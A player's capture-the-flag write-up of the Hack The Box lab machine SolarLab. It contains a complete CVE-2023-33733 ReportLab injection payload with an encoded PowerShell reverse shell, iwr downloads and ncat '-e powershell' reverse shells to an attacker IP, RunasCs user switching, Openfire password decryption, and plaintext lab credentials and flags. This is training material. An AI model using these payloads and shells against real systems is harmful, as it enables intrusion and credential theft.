SolarLab
Recon
└─$ tail -1 /etc/hosts
10.10.11.16 solarlab.htbSMB
└─$ netexec smb solarlab.htb -u '' -p '' --shares
SMB 10.10.11.16 445 SOLARLAB [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB 10.10.11.16 445 SOLARLAB [-] solarlab\: STATUS_ACCESS_DENIED
SMB 10.10.11.16 445 SOLARLAB [-] Error getting user: list index out of range
SMB 10.10.11.16 445 SOLARLAB [-] Error enumerating shares: Error occurs while reading from remote(104)
└─$ netexec smb solarlab.htb -u 'anonymous' -p '' --shares
SMB 10.10.11.16 445 SOLARLAB [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB 10.10.11.16 445 SOLARLAB [+] solarlab\anonymous:
SMB 10.10.11.16 445 SOLARLAB [*] Enumerated shares
SMB 10.10.11.16 445 SOLARLAB Share Permissions Remark
SMB 10.10.11.16 445 SOLARLAB ----- ----------- ------
SMB 10.10.11.16 445 SOLARLAB ADMIN$ Remote Admin
SMB 10.10.11.16 445 SOLARLAB C$ Default share
SMB 10.10.11.16 445 SOLARLAB Documents READ
SMB 10.10.11.16 445 SOLARLAB IPC$ READ Remote IPC
└─$ smbclient -U anonymous --no-pass //solarlab.htb/Documents
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Fri Apr 26 10:47:14 2024
.. DR 0 Fri Apr 26 10:47:14 2024
concepts D 0 Fri Apr 26 10:41:57 2024
desktop.ini AHS 278 Fri Nov 17 05:54:43 2023
details-file.xlsx A 12793 Fri Nov 17 07:27:21 2023
My Music DHSrn 0 Thu Nov 16 14:36:51 2023
My Pictures DHSrn 0 Thu Nov 16 14:36:51 2023
My Videos DHSrn 0 Thu Nov 16 14:36:51 2023
old_leave_request_form.docx A 37194 Fri Nov 17 05:35:57 2023
7779839 blocks of size 4096. 1790217 blocks available
smb: \> recurse
smb: \> dir
. DR 0 Fri Apr 26 10:47:14 2024
.. DR 0 Fri Apr 26 10:47:14 2024
concepts D 0 Fri Apr 26 10:41:57 2024
desktop.ini AHS 278 Fri Nov 17 05:54:43 2023
details-file.xlsx A 12793 Fri Nov 17 07:27:21 2023
My Music DHSrn 0 Thu Nov 16 14:36:51 2023
My Pictures DHSrn 0 Thu Nov 16 14:36:51 2023
My Videos DHSrn 0 Thu Nov 16 14:36:51 2023
old_leave_request_form.docx A 37194 Fri Nov 17 05:35:57 2023
\concepts
. D 0 Fri Apr 26 10:41:57 2024
.. D 0 Fri Apr 26 10:41:57 2024
Training-Request-Form.docx A 161337 Fri Nov 17 05:46:57 2023
Travel-Request-Sample.docx A 30953 Fri Nov 17 05:36:54 2023
\My Music
NT_STATUS_ACCESS_DENIED listing \My Music\*
\My Pictures
NT_STATUS_ACCESS_DENIED listing \My Pictures\*
\My Videos
NT_STATUS_ACCESS_DENIED listing \My Videos\*
smb: \> prompt
smb: \> mget *
getting file \desktop.ini of size 278 as desktop.ini (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
getting file \details-file.xlsx of size 12793 as details-file.xlsx (30.4 KiloBytes/sec) (average 17.2 KiloBytes/sec)
getting file \old_leave_request_form.docx of size 37194 as old_leave_request_form.docx (73.2 KiloBytes/sec) (average 39.7 KiloBytes/sec)
getting file \concepts\Training-Request-Form.docx of size 161337 as concepts/Training-Request-Form.docx (138.9 KiloBytes/sec) (average 87.1 KiloBytes/sec)
getting file \concepts\Travel-Request-Sample.docx of size 30953 as concepts/Travel-Request-Sample.docx (29.9 KiloBytes/sec) (average 70.0 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \My Music\*
NT_STATUS_ACCESS_DENIED listing \My Pictures\*
NT_STATUS_ACCESS_DENIED listing \My Videos\*Most of them are empty documents, except details-file, could be useful..
HTTP (80)
Nothing interesting on site itself, seems like a placeholder for service. feroxbuster didn't find anything and no subdomains was found with ffuf.
HTTP (6791)
When visiting port we are redirected to report subdomain.
┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ tail -1 /etc/hosts
10.10.11.16 solarlab.htb report.solarlab.htb
After trying credentials from SMB excel document many of them don't work. ``
al;ksdhfewoiuh
KAlexander
dkjafblkjadsfgl
d398sadsknr390
blake.byte
ThisCanB3typedeasily1@
AlexanderK
danenacia9234n
ClaudiaS
dadsfawe9dafkn
Till AlexanderK it said username doesn't exist, but password didn't work neither for AlexanderK nor ClaudiaS. But if we observe names have pattern: {Firstname}{LastnameFirstChar}
Trying this on blake we are able to login: BlakeB:ThisCanB3typedeasily1@
If we generate any report we get:
https://security.snyk.io/vuln/SNYK-PYTHON-REPORTLAB-5664897CVE-2023-33733 PoC
User input is limiting us to 300 characters and with this payload that's nearly impossible. We can use other fields, but what was weird is that server was giving 500 and I wanted to see any output. If we start listener and fire the reverse shell we are able to catch it even if server returns 500. Reverse shell from https://www.revshells.com
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwA0ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.16:62793.
whoami
solarlab\blake
PS C:\Users\blake\Documents\app>C:\Users\blake\Documents\app\reports\instance\users.db:
1
BlakeB
BlakeB
2
ClaudiaS
ClaudiaS
3
AlexanderK
ClaudiaS
4
blakeb
ThisCanB3typedeasily1@
5
claudias
007poiuytrewq
6
alexanderk
HotP!fireguard
PS C:\users\blake> tree /f
Folder PATH listing
Volume serial number is 385E-AC57
C:.
????Desktop
? user.txt
????Documents
? ? start-app.bat
? ????app
? ? app.py
? ? models.py
? ? routes.py
? ? utils.py
? ?
? ????instance
? ? users.db
? ?
? ????reports
? ? ? file.jpg
? ? ?
? ? ????instance
? ? users.dbUser.txt
PS C:\users\blake> cat desktop/user.txt
65214e8f8b87c116b3b226200dee9383Privilege Escalation
Running winPeas:
winPeas didn't show the ports running on localhost:
PS C:\users\public> Get-NetTCPConnection -State Listen -Localaddress 127.0.0.1
LocalAddress LocalPort RemoteAddress RemotePort State AppliedSetting
------------ --------- ------------- ---------- ----- --------------
127.0.0.1 9091 0.0.0.0 0 Listen
127.0.0.1 9090 0.0.0.0 0 Listen
127.0.0.1 7443 0.0.0.0 0 Listen
127.0.0.1 7070 0.0.0.0 0 Listen
127.0.0.1 5276 0.0.0.0 0 Listen
127.0.0.1 5275 0.0.0.0 0 Listen
127.0.0.1 5270 0.0.0.0 0 Listen
127.0.0.1 5269 0.0.0.0 0 Listen
127.0.0.1 5263 0.0.0.0 0 Listen
127.0.0.1 5262 0.0.0.0 0 Listen
127.0.0.1 5223 0.0.0.0 0 Listen
127.0.0.1 5222 0.0.0.0 0 Listen
127.0.0.1 5000 0.0.0.0 0 ListenI saw people using Chisel to forward the traffic from box to their machines, more about Tunneling
First of all use ConPtyShell to get a stable shell.
Privilege Escalation (openfire)
I somewhat gave up on ports for some time and tried my luck with runas, winrm failed but that's because the service isn't active. Using runas we can switch users:
PS C:\users> runas /user:openfire cmd
Enter the password for openfire: HotP!fireguard
Attempting to start cmd as user "SOLARLAB\openfire" ...
PS C:\users> whoami
solarlab\blake
PS C:\users> runas /user:openfire cmd
Enter the password for openfire: something wrong
Attempting to start cmd as user "SOLARLAB\openfire" ...
RUNAS ERROR: Unable to run - cmd
1326: The user name or password is incorrect.The shell wasn't started, but password is confirmed to be true. The reason it failed was because UAC is in place and from shell we can't do anything about it.
PS C:\users> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
...
EnableLUA REG_DWORD 0x1
...Upload RunasCs.exe:
PS C:\Users\blake\AppData\Local\Temp> iwr http://10.10.16.74/rc.exe -outfile rc.exe
PS C:\Users\blake\AppData\Local\Temp> .\rc.exe openfire HotP!fireguard whoami -b
solarlab\openfire
PS C:\Users\blake\AppData\Local\Temp> iwr http://10.10.16.74/ncat.exe -outfile nc.exe
PS C:\Users\blake\AppData\Local\Temp> .\rc.exe openfire HotP!fireguard "C:\Users\blake\AppData\Local\Temp\nc.exe 10.10.16.74 4444 -e powershell" -b
[-] RunasCsException: CreateProcessWithLogonWUacBypass failed with error code: Access is denied
PS C:\Users\blake\AppData\Local\Temp> cd /Users/Public
PS C:\Users\Public> cp C:\Users\blake\AppData\Local\Temp\nc.exe .
PS C:\Users\Public> C:\Users\blake\AppData\Local\Temp\rc.exe openfire HotP!fireguard "C:\Users\Public\nc.exe 10.10.16.74 4444 -e powershell" -bUser openfire doesn't have access to our directory so RunasCs fails to execute, but we can use /Users/Public which is accessible to most users.
During my enumeration I saw an openfire directory in Program Files, since username and dir name is same let's check it out.
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Connection from 10.10.11.16:54255.
PS C:\Windows\system32> whoami
whoami
solarlab\openfire
PS C:\Program Files\openfire\conf> cat security.xml
...
<!--
Any other property defined in this file will be treated as an encrypted
property. The value (in clear text) will be encrypted and migrated into
the Openfire database during the next startup. The property name will
be added to the list of encrypted properties and the clear text value
will be removed from this file.
<foo><bar>Secr3t$tr1ng!</bar></foo>
...
PS C:\Program Files\openfire> cat changelog.html | sls "<h2>.* -- <span" | select -first 5
cat changelog.html | sls "<h2>.* -- <span" | select -first 5
<h2>4.7.4 -- <span style="font-weight: normal;">November 9, 2022</span></h2>
<h2>4.7.3 -- <span style="font-weight: normal;">August 2, 2022</span></h2>
<h2>4.7.2 -- <span style="font-weight: normal;">July 13, 2022</span></h2>
<h2>4.7.1 -- <span style="font-weight: normal;">February 16, 2022</span></h2>
<h2>4.7.0 -- <span style="font-weight: normal;">January 19, 2022</span></h2>https://www.cybersecurity-help.cz/vdb/ignite_realtime/openfire/4.7.4/
https://www.cybersecurity-help.cz/vdb/SB2023052418
Not interesting, since we are already on the machine and have access to source
Privilege Escalation (Administrator)
PS C:\Program Files\openfire\embedded-db> cat openfire.script
...
CREATE MEMORY TABLE PUBLIC.OFUSER(
USERNAME VARCHAR(64) NOT NULL
,STOREDKEY VARCHAR(32)
,SERVERKEY VARCHAR(32)
,SALT VARCHAR(32)
,ITERATIONS INTEGER
,PLAINPASSWORD VARCHAR(32)
,ENCRYPTEDPASSWORD VARCHAR(255)
,NAME VARCHAR(100)
,EMAIL VARCHAR(100)
,CREATIONDATE VARCHAR(15) NOT NULL
,MODIFICATIONDATE VARCHAR(15) NOT NULL
,CONSTRAINT OFUSER_PK PRIMARY KEY(USERNAME)
)
...
INSERT INTO OFUSER VALUES(
'admin'
,'gjMoswpK+HakPdvLIvp6eLKlYh0='
,'9MwNQcJ9bF4YeyZDdns5gvXp620='
,'yidQk5Skw11QJWTBAloAb28lYHftqa0x'
,4096
,NULL
,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442'
,'Administrator'
,'admin@solarlab.htb'
,'001700223740785'
,'0'
)
...
CREATE MEMORY TABLE PUBLIC.OFPROPERTY(
NAME VARCHAR(100) NOT NULL
,PROPVALUE VARCHAR(4000) NOT NULL
,ENCRYPTED INTEGER
,IV CHARACTER(24)
,CONSTRAINT OFPROPERTY_PK PRIMARY KEY(NAME)
)
...
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
...While looking for a way to decrypt the hash I came over Hashcat forum which explained how it works, with code to decrypt it. openfire hash
Had a quick look at what OpenFire does and it is basically true what we said, but it does use SHA1 AND blowfish, basically. What one needs to have to decrypt the encrypted password (yes, they are encrypted not hashed, but there is also a SHA1 hash of the passwordKey field involved) is a passwordKey + the encrypted password. The first 8 bytes (16 chars, 8 hex) of the encrypted password is the initialization vector, the blowfish CBC key is stored in the database as "passwordKey" (<- this is SHA1 hashed before used as key to blowfish CBC).
Script: [[OpenFireDecryptPass.java]]
┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ javac OpenFireDecryptPass.java # Compile java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ java OpenFireDecryptPass # Run java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[-] Please specify the encypted password and the "passwordKey"
┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ java OpenFireDecryptPass becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
ThisPasswordShouldDo!@ (hex: 005400680069007300500061007300730077006F0072006400530068006F0075006C00640044006F00210040)I messed up big time here, openfire user doesn't have access to blake directory so I had to redowload the file since I was disconnected too. Note to the future: use directory where everyone has fucking access...
PS C:\Users\openfire\AppData\Local\Temp> iwr http://10.10.16.74/rc.exe -outfile rc.exe
iwr http://10.10.16.74/rc.exe -outfile rc.exe
PS C:\Users\openfire\AppData\Local\Temp> .\rc.exe Administrator ThisPasswordShouldDo!@ "C:\Users\Public\nc.exe 10.10.16.74 4444 -e powershell" -b
.\rc.exe Administrator ThisPasswordShouldDo!@ "C:\Users\Public\nc.exe 10.10.16.74 4444 -e powershell" -bRoot.txt
┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Connection from 10.10.11.16:50530.
PS C:\Windows\system32> whoami
solarlab\administrator
PS C:\Users\Administrator\Desktop> cat root.txt
cat root.txt
2c30666cd35226b4a5f36f20a61ea77dWriteups Referenced: https://medium.com/@Null0X0/solarlab-machine-htb-season-5-walkthrough-writeup-0be6c53a467a https://medium.com/@mjd.jellali/hackthebox-solarlab-walkthrough-5c9bd1bdcdb1
Last updated